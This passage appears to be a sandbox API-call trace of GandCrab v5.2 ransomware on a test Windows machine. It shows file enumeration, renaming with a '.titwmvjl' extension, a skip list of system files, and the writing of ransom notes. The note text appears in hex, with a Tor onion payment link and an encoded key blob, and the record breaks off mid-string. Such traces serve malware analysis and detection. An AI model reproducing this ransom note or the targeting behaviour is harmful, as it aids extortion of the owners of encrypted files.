param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Headlights\\d2ca4a09d2ca4deb61a.lock") returned 79 [0069.797] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Headlights\\d2ca4a09d2ca4deb61a.lock" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\adobe\\headlights\\d2ca4a09d2ca4deb61a.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x2bc [0069.797] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0069.797] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0069.797] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Headlights\\") returned 55 [0069.797] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Headlights\\", lpString2="*" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Headlights\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Headlights\\*" [0069.797] FindFirstFileExW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Headlights\\*", fInfoLevelId=0x1, lpFindFileData=0x259ed68, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x259ed68) returned 0x503738 [0069.797] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0069.797] FindNextFileW (in: hFindFile=0x503738, lpFindFileData=0x259ed68 | out: lpFindFileData=0x259ed68) returned 1 [0069.798] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0069.798] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0069.798] FindNextFileW (in: hFindFile=0x503738, lpFindFileData=0x259ed68 | out: lpFindFileData=0x259ed68) returned 1 [0069.798] lstrcmpW (lpString1="d2ca4a09d2ca4deb61a.lock", lpString2=".") returned 1 [0069.798] lstrcmpW (lpString1="d2ca4a09d2ca4deb61a.lock", lpString2="..") returned 1 [0069.798] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Headlights\\", lpString2="d2ca4a09d2ca4deb61a.lock" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Headlights\\d2ca4a09d2ca4deb61a.lock") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Headlights\\d2ca4a09d2ca4deb61a.lock" [0069.798] lstrlenW (lpString=".titwmvjl") returned 9 [0069.798] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Headlights\\d2ca4a09d2ca4deb61a.lock") returned 79 [0069.798] VirtualAlloc (lpAddress=0x0, dwSize=0xde, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0069.798] wsprintfW (in: param_1=0x25d0000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Headlights\\d2ca4a09d2ca4deb61a.lock.titwmvjl") returned 88 [0069.798] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Headlights\\d2ca4a09d2ca4deb61a.lock") returned 79 [0069.798] lstrlenW (lpString=".lock") returned 5 [0069.798] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0069.798] wsprintfW (in: param_1=0x2630000, param_2="%ws " | out: param_1=".lock ") returned 6 [0069.798] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0069.798] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0069.798] FindNextFileW (in: hFindFile=0x503738, lpFindFileData=0x259ed68 | out: lpFindFileData=0x259ed68) returned 1 [0069.799] lstrcmpW (lpString1="TITWMVJL-DECRYPT.txt", lpString2=".") returned 1 [0069.799] lstrcmpW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="..") returned 1 [0069.799] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Headlights\\", lpString2="TITWMVJL-DECRYPT.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Headlights\\TITWMVJL-DECRYPT.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Headlights\\TITWMVJL-DECRYPT.txt" [0069.799] lstrlenW (lpString=".titwmvjl") returned 9 [0069.799] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Headlights\\TITWMVJL-DECRYPT.txt") returned 75 [0069.799] VirtualAlloc (lpAddress=0x0, dwSize=0xd6, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0069.799] wsprintfW (in: param_1=0x25d0000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Headlights\\TITWMVJL-DECRYPT.txt.titwmvjl") returned 84 [0069.799] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Headlights\\TITWMVJL-DECRYPT.txt") returned 75 [0069.799] lstrlenW (lpString=".txt") returned 4 [0069.799] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0069.799] wsprintfW (in: param_1=0x2630000, param_2="%ws " | out: param_1=".txt ") returned 5 [0069.799] lstrcmpiW (lpString1=".txt", lpString2=".titwmvjl") returned 1 [0069.799] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0069.799] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Headlights\\TITWMVJL-DECRYPT.txt") returned 75 [0069.799] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Headlights\\TITWMVJL-DECRYPT.txt") returned 75 [0069.799] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="desktop.ini") returned 1 [0069.799] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="autorun.inf") returned 1 [0069.799] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="ntuser.dat") returned 1 [0069.799] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="iconcache.db") returned 1 [0069.799] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="bootsect.bak") returned 1 [0069.800] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="boot.ini") returned 1 [0069.800] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="ntuser.dat.log") returned 1 [0069.800] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="thumbs.db") returned 1 [0069.800] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0069.800] FindNextFileW (in: hFindFile=0x503738, lpFindFileData=0x259ed68 | out: lpFindFileData=0x259ed68) returned 0 [0069.800] FindClose (in: hFindFile=0x503738 | out: hFindFile=0x503738) returned 1 [0069.800] CloseHandle (hObject=0x2bc) returned 1 [0069.800] FindNextFileW (in: hFindFile=0x5034f8, lpFindFileData=0x259effc | out: lpFindFileData=0x259effc) returned 1 [0069.800] lstrcmpW (lpString1="Linguistics", lpString2=".") returned 1 [0069.800] lstrcmpW (lpString1="Linguistics", lpString2="..") returned 1 [0069.800] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\", lpString2="Linguistics" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Linguistics") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Linguistics" [0069.800] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Linguistics", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Linguistics\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Linguistics\\" [0069.800] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x25d0000 [0069.801] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0069.801] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0069.801] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0069.801] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0069.801] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0069.801] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0069.801] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0069.802] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0069.802] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0069.802] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0069.802] wsprintfW (in: param_1=0x25d0200, param_2="%s\\%s-DECRYPT.txt" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Linguistics\\\\TITWMVJL-DECRYPT.txt") returned 77 [0069.802] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Linguistics\\\\TITWMVJL-DECRYPT.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\adobe\\linguistics\\titwmvjl-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2bc [0069.803] lstrlenW (lpString="\xfeff\x2d\x2d\x2d\x3d\x20\x20\x20\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x56\x35\x2e\x32\x20\x20\x20\x20\x3d\x2d\x2d\x2d\x20\x0d\x0a\x0d\x0a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x55\x4e\x44\x45\x52\x20\x4e\x4f\x20\x43\x49\x52\x43\x55\x4d\x53\x54\x41\x4e\x43\x45\x53\x20\x44\x4f\x20\x4e\x4f\x54\x20\x44\x45\x4c\x45\x54\x45\x20\x54\x48\x49\x53\x20\x46\x49\x4c\x45\x2c\x20\x55\x4e\x54\x49\x4c\x20\x41\x4c\x4c\x20\x59\x4f\x55\x52\x20\x44\x41\x54\x41\x20\x49\x53\x20\x52\x45\x43\x4f\x56\x45\x52\x45\x44\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x09\x2a\x2a\x2a\x2a\x2a\x46\x41\x49\x4c\x49\x4e\x47\x20\x54\x4f\x20\x44\x4f\x20\x53\x4f\x2c\x20\x57\x49\x4c\x4c\x20\x52\x45\x53\x55\x4c\x54\x20\x49\x4e\x20\x59\x4f\x55\x52\x20\x53\x59\x53\x54\x45\x4d\x20\x43\x4f\x52\x52\x55\x50\x54\x49\x4f\x4e\x2c\x20\x49\x46\x20\x54\x48\x45\x52\x45\x20\x41\x52\x45\x20\x44\x45\x43\x52\x59\x50\x54\x49\x4f\x4e\x20\x45\x52\x52\x4f\x52\x53\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x41\x74\x74\x65\x6e\x74\x69\x6f\x6e\x21\x20\x0d\x0a\x0d\x0a\x41\x6c\x6c\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2c\x20\x64\x6f\x63\x75\x6d\x65\x6e\x74\x73\x2c\x20\x70\x68\x6f\x74\x6f\x73\x2c\x20\x64\x61\x74\x61\x62\x61\x73\x65\x73\x20\x61\x6e\x64\x20\x6f\x74\x68\x65\x72\x20\x69\x6d\x70\x6f\x72\x74\x61\x6e\x74\x20\x66\x69\x6c\x65\x73\x20\x61\x72\x65\x20\x65\x6e\x63\x72\x79\x70\x74\x65\x64\x20\x61\x6e\x64\x20\x68\x61\x76\x65\x20\x74\x68\x65\x20\x65\x78\x74\x65\x6e\x73\x69\x6f\x6e\x3a\x20\x2e\x54\x49\x54\x57\x4d\x56\x4a\x4c\x20\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x6f\x6e\x6c\x79\x20\x6d\x65\x74\x68\x6f\x64\x20\x6f\x66\x20\x72\x65\x63\x6f\x76\x65\x72\x69\x6e\x67\x20\x66\x69\x6c\x65\x73\x20\x69\x73\x20\x74\x6f\x20\x70\x75\x72\x63\x68\x61\x73\x65\x20\x61\x6e\x20\x75\x6e\x69\x71\x75\x65\x20\x70\x72\x69\x76\x61\x74\x65\x20\x6b\x65\x79\x2e\x20\x4f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x67\x69\x76\x65\x20\x79\x6f\x75\x20\x74\x68\x69\x73\x20\x6b\x65\x79\x20\x61\x6e\x64\x20\x6f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x72\x65\x63\x6f\x76\x65\x72\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2e\x0d\x0a\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x73\x65\x72\x76\x65\x72\x20\x77\x69\x74\x68\x20\x79\x6f\x75\x72\x20\x6b\x65\x79\x20\x69\x73\x20\x69\x6e\x20\x61\x20\x63\x6c\x6f\x73\x65\x64\x20\x6e\x65\x74\x77\x6f\x72\x6b\x20\x54\x4f\x52\x2e\x20\x59\x6f\x75\x20\x63\x61\x6e\x20\x67\x65\x74\x20\x74\x68\x65\x72\x65\x20\x62\x79\x20\x74\x68\x65\x20\x66\x6f\x6c\x6c\x6f\x77\x69\x6e\x67\x20\x77\x61\x79\x73\x3a\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x7c\x20\x30\x2e\x20\x44\x6f\x77\x6e\x6c\x6f\x61\x64\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x2d\x20\x68\x74\x74\x70\x73\x3a\x2f\x2f\x77\x77\x77\x2e\x74\x6f\x72\x70\x72\x6f\x6a\x65\x63\x74\x2e\x6f\x72\x67\x2f\x20\x0d\x0a\x0d\x0a\x7c\x20\x31\x2e\x20\x49\x6e\x73\x74\x61\x6c\x6c\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x32\x2e\x20\x4f\x70\x65\x6e\x20\x54\x6f\x72\x20\x42\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x33\x2e\x20\x4f\x70\x65\x6e\x20\x6c\x69\x6e\x6b\x20\x69\x6e\x20\x54\x4f\x52\x20\x62\x72\x6f\x77\x73\x65\x72\x3a\x20\x20\x20\x68\x74\x74\x70\x3a\x2f\x2f\x67\x61\x6e\x64\x63\x72\x61\x62\x6d\x66\x65\x36\x6d\x6e\x65\x66\x2e\x6f\x6e\x69\x6f\x6e\x2f\x39\x39\x38\x61\x32\x66\x34\x35\x64\x32\x63\x61\x34\x64\x65\x66\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x7c\x20\x34\x2e\x20\x46\x6f\x6c\x6c\x6f\x77\x20\x74\x68\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x74\x68\x69\x73\x20\x70\x61\x67\x65\x20\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x4f\x6e\x20\x6f\x75\x72\x20\x70\x61\x67\x65\x20\x79\x6f\x75\x20\x77\x69\x6c\x6c\x20\x73\x65\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x70\x61\x79\x6d\x65\x6e\x74\x20\x61\x6e\x64\x20\x67\x65\x74\x20\x74\x68\x65\x20\x6f\x70\x70\x6f\x72\x74\x75\x6e\x69\x74\x79\x20\x74\x6f\x20\x64\x65\x63\x72\x79\x70\x74\x20\x31\x20\x66\x69\x6c\x65\x20\x66\x6f\x72\x20\x66\x72\x65\x65\x2e\x20\x0d\x0a\x0d\x0a\x0d\x0a\x41\x54\x54\x45\x4e\x54\x49\x4f\x4e\x21\x0d\x0a\x0d\x0a\x49\x4e\x20\x4f\x52\x44\x45\x52\x20\x54\x4f\x20\x50\x52\x45\x56\x45\x4e\x54\x20\x44\x41\x54\x41\x20\x44\x41\x4d\x41\x47\x45\x3a\x0d\x0a\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x4d\x4f\x44\x49\x46\x59\x20\x45\x4e\x43\x52\x59\x50\x54\x45\x44\x20\x46\x49\x4c\x45\x53\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x43\x48\x41\x4e\x47\x45\x20\x44\x41\x54\x41\x20\x42\x45\x4c\x4f\x57\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x6c\x41\x51\x41\x41\x42\x42\x6a\x58\x74\x68\x4a\x35\x51\x30\x77\x50\x44\x4f\x69\x52\x2f\x55\x55\x71\x42\x6a\x71\x4e\x47\x47\x52\x4d\x53\x45\x54\x66\x6e\x4b\x46\x4e\x2f\x77\x43\x30\x5a\x32\x79\x38\x75\x58\x4e\x4b\x2f\x63\x51\x52\x78\x51\x2b\x75\x78\x6a\x76\x48\x59\x6f\x52\x4e\x57\x4b\x4f\x77\x79\x70\x66\x53\x6e\x77\x69\x73\x61\x7a\x66\x6f\x32\x49\x75\x35\x76\x57\x57\x2b\x52\x43\x6b\x47\x47\x42\x31\x47\x6e\x65\x73\x51\x6b\x51\x77\x75\x54\x32\x41\x5a\x78\x56\x78\x35\x51\x59\x34\x69\x65\x2b\x6c\x65\x57\x2f\x4d\x5a\x41\x77\x47\x50\x70\x7a\x38\x2f\x37\x64\x5a\x77\x6f\x4c\x2b\x55\x71\x71\x4f\x77\x4d\x70\x54\x47\x33\x2b\x41\x6e\x76\x45\x51\x33\x4c\x4d\x6e\x49\x69\x51\x63\x70\x34\x48\x44\x66\x64\x33\x38\x4d\x50\x52\x43\x73\x52\x36\x67\x71\x63\x49\x48\x6f\x42\x70\x55\x4c\x77\x43\x33\x47\x6d\x37\x78\x7a\x74\x5a\x42\x69\x48\x47\x5a\x67\x5a\x56\x37\x4c\x6e\x61\x67\x51\x6b\x72\x4f\x41\x6c\x77\x54\x31\x36\x69\x70\x71\x4c\x31\x7a\x58\x54\x34\x6b\x4f\x79\x47\x45\x5a\x4c\x53\x6c\x71\x36\x48\x52\x57\x72\x52\x4a\x6b\x59\x53\x51\x35\x7a\x4c\x74\x50\x31\x54\x6b\x34\x68\x6d\x6d\x42\x51\x31\x66\x6f\x6a\x57\x46\x72\x63\x6f\x54\x34\x36\x78\x63\x76\x57\x2b\x33\x53\x33\x30\x6e\x56\x30\x46\x43\x51\x59\x64\x6a\x35\x68\x48\x66\x62\x50\x6c\x62\x4f\x52\x5a\x72\x69\x34\x6e\x2b\x65\x55\x43\x49\x6c\x46\x31\x74\x4b\x78\x62\x45\x69\x51\x74\x4a\x4e\x74\x66\x66\x74\x31\x76\x6b\x59\x31\x62\x6e\x78\x49\x64\x74\x45\x74\x57\x62\x49\x4e\x77\x6c\x75\x6e\x2f\x31\x39\x37\x67\x4f\x72\x72\x49\x58\x4a\x2b\x45\x70\x37\x61\x31\x73\x34\x68\x41\x54\x32\x6b\x45\x6b\x6d\x31\x48\x55\x4e\x39\x39\x46\x55\x4d\x7a\x2b\x49\x73\x51\x45\x4b\x35\x41\x44\x59\x6d\x35\x4a\x73\x42\x55\x61\x63\x59\x6c\x58\x52\x65\x77\x77\x78\x4e\x41\x55\x67\x6b\x77\x54\x51\x31\x69\x78\x57\x48\x63\x68\x36\x4c\x4e\x66\x6f\x46\x62\x78\x2f\x59\x30\x51\x67\x6c\x59\x47\x6c\x37\x36\x62\x4c\x67\x6c\x6a\x67\x6c\x50\x69\x61\x72\x2b\x46\x4d\x6d\x73\x4a\x6b\x48\x44\x78\x58\x46\x41\x64\x70\x56\x50\x4d\x4b\x54\x2b\x50\x70\x63\x6e\x32\x67\x31\x52\x65\x6f\x6d\x79\x5a\x73\x41\x77\x33\x30\x68\x4e\x4d\x79\x59\x43\x74\x79\x7a\x59\x56\x6d\x51\x7a\x4e\x56\x56\x77\x65\x76\x4d\x6b\x70\x71\x33\x44\x66\x76\x30\x76\x48\x65\x43\x6a\x58\x63\x30\x71\x67\x72\x38\x48\x53\x78\x6f\x57\x53\x6c\x56\x42\x7a\x55\x4c\x72\x47\x64\x77\x71\x7a\x61\x62\x59\x79\x6f\x72\x78\x32\x77\x62\x32\x6c\x50\x71\x6e\x43\x73\x4c\x2f\x59\x4f\x74\x63\x72\x69\x65\x50\x62\x77\x73\x57\x59\x46\x5a\x51\x47\x46\x63\x31\x4a\x6f\x71\x4a\x4a\x5a\x35\x4a\x74\x74\x4a\x35\x31\x45\x4c\x44\x52\x43\x4e\x4d\x44\x68\x74\x5a\x76\x42\x66\x61\x49\x7a\x65\x39\x54\x5a\x4c\x52\x61\x43\x42\x69\x30\x4d\x4a\x68\x54\x57\x30\x38\x74\x63\x66\x54\x6f\x62\x4a\x76\x4a\x30\x4d\x39\x34\x56\x62\x51\x44\x76\x2b\x4e\x51\x37\x6e\x6b\x78\x69\x35\x53\x33\x38\x67\x32\x46\x72\x4d\x38\x48\x75\x66\x71\x71\x49\x34\x5a\x67\x4c\x6f\x71\x43\x74\x45\x5a\x44\x67\x69\x62\x74\x42\x77\x51\x7a\x6d\x77\x30\x55\x2b\x64\x2f\x66\x69\x6d\x4d\x4e\x57\x66\x77\x4f\x55\x35\x65\x36\x77\x50\x4e\x6a\x50\x48\x5a\x6a\x73\x57\x38\x2f\x34\x48\x66\x30\x66\x67\x58\x41\x76\x42\x32\x2b\x67\x6b\x76\x52\x73\x75\x48\x53\x69\x75\x57\x53\x30\x5a\x78\x7a\x2f\x41\x42\x33\x4e\x69\x47\x4f\x64\x5a\x50\x64\x78\x72\x71\x4b\x71\x59\x49\x42\x4f\x6b\x4b\x35\x47\x48\x36\x6e\x39\x31\x51\x69\x74\x2f\x43\x66\x46\x66\x4e\x43\x68\x51\x59\x79\x73\x59\x48\x69\x45\x55\x31\x6d\x43\x4a\x2f\x46\x2f\x42\x6d\x65\x4a\x79\x37\x74\x41\x30\x55\x72\x62\x72\x6f\x4c\x53\x66\x45\x74\x7a\x53\x78\x63\x36\x4e\x73\x54\x48\x41\x65\x65\x6d\x48\x6e\x4e\x77\x38\x6d\x4c\x56\x41\x70\x52\x6e\x68\x50\x42\x36\x73\x36\x69\x5a\x66\x59\x6b\x62\x6f\x44\x4c\x45\x37\x64\x72\x56\x44\x6c\x52\x72\x66\x7a\x62\x6f\x63\x31\x56\x6e\x47\x76\x46\x66\x46\x42\x66\x2b\x5a\x37\x6b\x2b\x57\x55\x76\x6b\x6b\x68\x63\x41\x43\x5a\x69\x4b\x74\x6c\x50\x62\x70\x35\x34\x53\x2f\x73\x2b\x55\x73\x6d\x4e\x48\x6a\x55\x4e\x52\x36\x44\x78\x53\x49\x32\x31\x75\x61\x45\x50\x32\x4d\x30\x71\x75\x57\x53\x65\x46\x4a\x38\x77\x76\x61\x2b\x6e\x2f\x6c\x47\x35\x58\x75\x4c\x78\x4b\x4d\x59\x53\x44\x48\x4f\x61\x39\x79\x73\x34\x31\x48\x69\x51\x7a\x43\x33\x41\x33\x52\x67\x73\x2f\x78\x58\x4f\x74\x66\x4d\x31\x78\x6b\x56\x4d\x65\x6c\x5a\x78\x39\x64\x67\x6c\x6f\x66\x33\x34\x4a\x34\x47\x61\x6f\x45\x37\x53\x64\x34\x75\x41\x32\x6b\x79\x61\x4c\x76\x57\x62\x44\x43\x68\x55\x38\x5a\x46\x48\x48\x2b\x4c\x4f\x43\x66\x56\x41\x5a\x61\x48\x34\x55\x6e\x42\x65\x48\x63\x37\x68\x70\x36\x43\x53\x6a\x30\x4b\x77\x73\x31\x68\x30\x31\x46\x63\x58\x67\x74\x76\x6a\x43\x6e\x41\x70\x6a\x55\x37\x46\x72\x59\x53\x42\x43\x72\x77\x7a\x53\x73\x58\x4f\x55\x6b\x36\x41\x43\x34\x37\x41\x69\x56\x69\x48\x2f\x71\x45\x66\x42\x34\x44\x73\x66\x33\x72\x4e\x59\x38\x4a\x44\x62\x51\x54\x44\x72\x73\x57\x7a\x49\x39\x6f\x62\x71\x4e\x53\x4f\x46\x65\x2f\x4a\x4f\x73\x64\x4e\x4e\x56\x6c\x78\x39\x67\x51\x31\x79\x57\x59\x38\x4e\x65\x33\x51\x33\x76\x71\x62\x32\x61\x4e\x67\x6c\x67\x35\x2b\x6d\x6e\x66\x72\x4f\x50\x62\x51\x4a\x33\x66\x36\x53\x48\x79\x52\x53\x63\x68\x6f\x44\x72\x4a\x66\x7a\x38\x43\x69\x78\x75\x39\x53\x6b\x39\x38\x44\x59\x57\x66\x6a\x6e\x73\x70\x75\x35\x59\x64\x2f\x50\x78\x47\x44\x32\x55\x4f\x62\x6b\x30\x62\x68\x65\x4d\x78\x68\x52\x69\x73\x42\x63\x39\x42\x63\x7a\x53\x4f\x4c\x2b\x36\x74\x6c\x65\x62\x68\x42\x6d\x54\x68\x38\x4c\x46\x61\x56\x6f\x6d\x4b\x31\x53\x38\x75\x7a\x74\x73\x68\x52\x56\x63\x4f\x4a\x68\x70\x37\x6f\x2b\x48\x56\x35\x64\x51\x54\x35\x77\x41\x4c\x53\x79\x4c\x36\x67\x4e\x52\x47\x6e\x4f\x6a\x35\x34\x58\x51\x36\x75\x35\x36\x48\x2f\x70\x6a\x63\x2b\x54\x4b\x6c\x59\x30\x61\x57\x52\x76\x38\x76\x65\x63\x59\x44\x52\x44\x48\x4c\x55\x6e\x45\x48\x41\x42\x4c\x46\x71\x4a\x50\x36\x58\x79\x64\x31\x48\x53\x57\x32\x36\x4b\x65\x74\x6a\x56\x37\x4b\x6e\x42\x49\x68\x39\x46\x5a\x68\x67\x6b\x61\x64\x68\x71\x4f\x57\x75\x55\x67\x66\x6f\x53\x6f\x62\x72\x32\x61\x4d\x37\x59\x4f\x6a\x67\x5a\x52\x68\x44\x69\x6e\x59\x62\x31\x73\x54\x49\x49\x77\x62\x6d\x63\x64\x6f\x55\x45\x45\x62\x6a\x4c\x50\x7a\x33\x35\x2f\x70\x44\x62\x33\x72\x4b\x2f\x6a\x65\x53\x62\x43\x61\x70\x43\x68\x33\x7a\x43\x66\x66\x48\x72\x31\x68\x39\x58\x59\x57\x4c\x37\x6f\x67\x6c\x4b\x31\x49\x79\x39\x53\x6e\x50\x7a\x72\x4e\x74\